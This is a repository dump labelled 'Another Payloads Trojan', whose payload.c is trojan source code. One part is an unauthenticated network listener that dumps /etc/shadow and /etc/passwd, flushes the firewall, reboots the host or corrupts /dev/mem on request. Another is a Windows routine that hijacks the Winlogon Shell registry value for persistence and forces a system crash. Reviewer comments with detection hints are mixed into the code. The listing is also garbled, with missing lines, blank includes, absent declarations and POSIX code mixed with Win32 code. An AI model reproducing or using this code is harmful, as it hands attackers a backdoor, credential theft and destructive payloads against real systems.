├── preview.png ├── .gitignore ├── README.md ├── LICENSE └── payload.c /preview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/byt3n33dl3/CARNOTAURUS/HEAD/preview.png -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *swo 2 | *swp 3 | *~ 4 | *.tmp 5 | temp/* 6 | .bundle 7 | .venv 8 | .goenv 9 | .config 10 | *.lock 11 | *.log 12 | bin/* 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### Another Payloads Trojan 2 | 3 | ![payload](https://github.com/Sulaimannabdul/Trojan-LetsBeFriend/assets/151133481/c008397e-6c87-4509-bf31-0b3621a94513) 4 | 5 | #### ***Note: Educational purposes only*** 6 | ##### ***Credit to some DN coffee*** 7 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Sulaiman 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #define NT_ERROR_CODE 0xC0000022 5 | 6 | /* main: TCP command listener. Calls dupStreamz() to point stdout at a pipe, creates a socket, binds on INADDR_ANY starting at PORT and trying the next port after each bind() failure, then for every accepted connection reads one request into Request, maps it to an action code with getAXN() and lets tellClient() run the matching shell command and send the output back. NOTE(review): no authentication or peer check is visible on this path, so any host that can reach the port can select an action. The header names of the three include lines are missing from this listing, and fd, fd2, Request, axnCode, pfds, PORT, BACKLOG and MAXSTRSIZE are used without a visible declaration. Detection: an unexpected listener bound to all interfaces, and a zerror.log file appended to in the working directory on each failed call. */ 7 | int main() 8 | { 9 | int numbytes; 10 | 11 | struct sockaddr_in server; /* server's address information */ 12 | struct sockaddr_in client; /* client's address information */ 13 | 14 | int sin_size; 15 | 16 | dupStreamz(); 17 | 18 | if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */ 19 | system("echo 'socket() error' >> zerror.log"); 20 | printf("server: socket() error\n"); 21 | exit(-1); 22 | } 23 | 24 | server.sin_family = AF_INET; 25 | server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */ 26 | 27 | int noobPort = PORT; 28 | for (noobPort=PORT; noobPort < 65535; noobPort = noobPort+1){ 29 | server.sin_port = htons(noobPort); /* Remember htons() from "Conversions" section? 
=) */ 30 | bzero(&(server.sin_zero),8); /* zero the rest of the structure */ 31 | 32 | if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){ /* calls bind() */ 33 | system("echo 'bind() error' >> zerror.log"); 34 | printf("server: bind(%d) error\n", noobPort); 35 | if (noobPort >= 65535) { 36 | exit(-1); 37 | } 38 | } else { 39 | break; 40 | } 41 | } 42 | printf("listing at :%d", noobPort); 43 | if(listen(fd,BACKLOG) == -1){ /* calls listen() */ 44 | system("echo 'listen() error' >> zerror.log"); 45 | printf("server: listen() error\n"); 46 | } 47 | /* Serve forever, one connection at a time: accept, take a single recv() worth of data as the request, act on it, close the connection. */ 48 | while(1){ 49 | sin_size=sizeof(struct sockaddr_in); 50 | if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){ /* calls accept() */ 51 | system("echo 'accept() error' >> zerror.log"); 52 | printf("server: accept() error\n"); 53 | exit(-1); 54 | } 55 | 56 | if ( (numbytes = recv(fd2, Request, MAXSTRSIZE, 0)) > 0 ) 57 | { 58 | Request[numbytes]='\0'; 59 | //sscanf(buf, "GET %s HTTP", Req); 60 | }else{ 61 | printf("server: recv() error"); 62 | system("echo 'recv() error' >> zerror.log"); 63 | } 64 | /* The request text alone selects the action: getAXN() returns the code and tellClient() acts on the global axnCode. */ 65 | axnCode = getAXN();//1; 66 | tellClient(); 67 | 68 | close(fd2); /* close fd2 */ 69 | printf("[+] %s\n", Request); 70 | } 71 | return 0; 72 | } 73 | 74 | 75 | /* 76 | * it duplicates STDOUT to a Program Handled Stream using it 77 | * output of system commands is captured in this stream directly 78 | */ /* NOTE(review): close(1) followed by dup(pfds[1]) makes the write end of the pipe the new descriptor 1 (dup returns the lowest free descriptor, which is 1 as long as descriptor 0 is still open). From then on the output of system() children, and the printf() calls of this program itself, lands in the pipe that tellClient() reads from pfds[0]. On pipe() failure it appends to zerror.log and exits with status 1. */ 79 | void dupStreamz(){ 80 | if(pipe(pfds) == -1){ 81 | system("echo 'IPC error' >> zerror.log"); 82 | perror("server: PiPiNG FlaW"); 83 | exit(1); 84 | } 85 | 86 | close(1); 87 | dup(pfds[1]); 88 | return; 89 | } 90 | 91 | 92 | /* 93 | * it checks for the desired action in axnCode, 94 | * executes the desired system command 95 | * builds up the HTTP Response with desired Output 96 | * send the HTTP Response to Client 97 | */ /* NOTE(review): every visible case runs a fixed command string through system(); nothing from the request is interpolated into the strings shown. The visible cases read the passwd, shadow and resolv.conf files under /etc, list processes and network interfaces, flush iptables, power off or reboot the host, and case 0 writes /dev/urandom into /dev/mem. Lines 104-114 of payload.c are missing from this listing (the text between "idx" and "n00bROOT" was lost), so the clearing loop, the switch header and the first case cannot be reviewed here. Detection: this process spawning a shell with exactly these command lines, in particular the shadow read and the iptables flush. */ 98 | void tellClient(){ 99 | char buf[MAXSTRSIZE] = "HTTP 200 OK\0"; //buffer to hold System Commands' Output 100 | char tmpBuf[MAXSTRSIZE]; 101 | int idx; 102 | 103 | 
//clearing previous stream content 104 | for(idx=0; idx
n00bROOT\""); break; 115 | //hangs the TuX machine 116 | case 0: strcpy(httpResponse,httpResponse200); 117 | system("cat /dev/urandom > /dev/mem"); break; 118 | //all entries of /etc/passwd 119 | case 1: strcpy(httpResponse,httpResponse200); 120 | system("cat /etc/passwd 2>&1 | sed 's/\\n//g' | sed 's/\\r//g'"); break; 121 | //all entries of /etc/shadow 122 | case 2: strcpy(httpResponse,httpResponse200); 123 | system("cat /etc/shadow 2>&1 | sed 's/\\n//g' | sed 's/\\r//g'"); break; 124 | //all entries of /etc/resolv.conf 125 | case 3: strcpy(httpResponse,httpResponse200); 126 | system("cat /etc/resolv.conf 2>&1"); break; 127 | //prints entire ps list 128 | case 4: strcpy(httpResponse,httpResponse200); 129 | system("ps aux"); break; 130 | //deletes all entries of IPTABLES (Firewall) 131 | case 5: strcpy(httpResponse,httpResponse200); 132 | system("iptables --flush 2>&1 && echo \'IPTables Entries Deleted\'"); break; 133 | //all information of all NICs 134 | case 6: strcpy(httpResponse,httpResponse200); 135 | system("ifconfig -a 2>&1 || ip -a 2>&1 || networkctl --no-legend --no-pager status 2>&1"); break; 136 | //System Coded Info of all NICs 137 | case 7: strcpy(httpResponse,httpResponse200); 138 | system("ifconfig -s 2>&1 || ip link 2>&1 || networkctl --no-legend --no-pager list 2>&1"); break; 139 | //PowerOff 140 | case 8: strcpy(httpResponse,httpResponse200); 141 | system("poweroff 2>&1"); break; 142 | //Reboot 143 | case 9: strcpy(httpResponse,httpResponse200); 144 | system("reboot 2>&1"); break; 145 | //default case 146 | default: strcpy(httpResponse,httpResponse400); 147 | system("echo \"HTTP 404\""); break; 148 | } /* The reply is the chosen status text followed by whatever the command wrote into the pipe: one read() of at most MAXSTRSIZE bytes from pfds[0], both parts appended to tmpBuf, then sent on fd2 as-is. */ 149 | read(pfds[0], buf, MAXSTRSIZE); 150 | strncat(tmpBuf,httpResponse,strlen(httpResponse)); 151 | strncat(tmpBuf,buf,strlen(buf)); 152 | send(fd2,tmpBuf,(strlen(httpResponse)+strlen(buf)),0); 153 | return; 154 | } 155 | 156 | 157 | /* 158 | * extracts the action code from HTTP Request 159 | * returns back the action Code 160 | */ /* NOTE(review): strtok() splits the global Request in place on spaces; the second token (the request target when the request has the shape METHOD target ...) is printed and handed to getAXNCode(). Returns -10 when the request has fewer than two space-separated tokens. */ 161 | int 
getAXN(){ 162 | char *axnTok; 163 | if((axnTok=strtok(Request," ")) != NULL){ 164 | if((axnTok=strtok(NULL," ")) != NULL){ 165 | printf("\naxn: %s\n",axnTok); 166 | return getAXNCode(axnTok); 167 | } 168 | } 169 | return -10; 170 | } 171 | 172 | 173 | /* 174 | * getAXNCode maps passed string to action token and returns int code 175 | */ /* NOTE(review): the exact string "/n00b" maps to -1. Otherwise only the first character after the last slash (or the first character of the token when it has no slash) is used, as that character minus the character 0, so one-digit targets give 0..9 and any other character gives a value outside that range. No digit or length check is made. */ 176 | int getAXNCode(char* axnTok){ 177 | if(strcmp("/n00b",axnTok)==0) 178 | return -1; 179 | 180 | char *axnCodeCharSlash = strrchr(axnTok, '/'); 181 | char *axnCodeChar = axnCodeCharSlash ? axnCodeCharSlash + 1 : axnTok; 182 | 183 | int axnCodeInt = *axnCodeChar - '0'; 184 | return axnCodeInt; 185 | } 186 | /* WinMain: Windows entry point. It (1) reads the path of the running module and stores it in the "Shell" value under HKEY_CURRENT_USER Software\Microsoft\Windows NT\CurrentVersion\Winlogon, (2) marks that file system + hidden + not-content-indexed + read-only, and (3) asks for privilege 0x13 through RtlAdjustPrivilege and, when that returns 0, calls NtRaiseHardError with NT_ERROR_CODE. NOTE(review): step 1 is a logon-persistence indicator and step 3 is a call pattern commonly associated with forcing a system crash - confirm the behaviour in a sandbox. The file mixes POSIX calls (pipe, dup, bzero) with Win32 calls, so it presumably does not build as one program as shown. No return statement is visible. Detection: registry auditing on the Winlogon Shell value for the user hive, and an executable in a user-writable location being switched to hidden + system. */ 187 | int APIENTRY WinMain( 188 | HINSTANCE hInstance, HINSTANCE hPrevInstance, 189 | LPSTR lpCmdLine, int nCmdShow) { 190 | TCHAR szFilePath[MAX_PATH]; 191 | GetModuleFileName(NULL, szFilePath, MAX_PATH); 192 | 193 | HKEY hKey; 194 | if (RegCreateKeyEx(HKEY_CURRENT_USER, 195 | TEXT("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"), 196 | 0x00, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) 197 | RegSetValueEx(hKey, 198 | TEXT("Shell"), 199 | 0x00, REG_SZ, (LPBYTE)szFilePath, (DWORD)(_tcslen(szFilePath) + 1) * sizeof(TCHAR)); 200 | RegCloseKey(hKey); 201 | 202 | SetFileAttributesA(szFilePath, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED | FILE_ATTRIBUTE_READONLY); 203 | 204 | BOOLEAN previousValue; 205 | ULONG response; 206 | 207 | if (RtlAdjustPrivilege(0x13, // [SeShutdownPrivilege] 208 | TRUE, FALSE, &previousValue) == 0x00) { 209 | // 0110 = 01 10 = [ResponseOptionOk + ResponseOptionCancel] 210 | NtRaiseHardError(NT_ERROR_CODE, 0x00, 0x00, NULL, 0b0110, &response); 211 | } 212 | } 213 | --------------------------------------------------------------------------------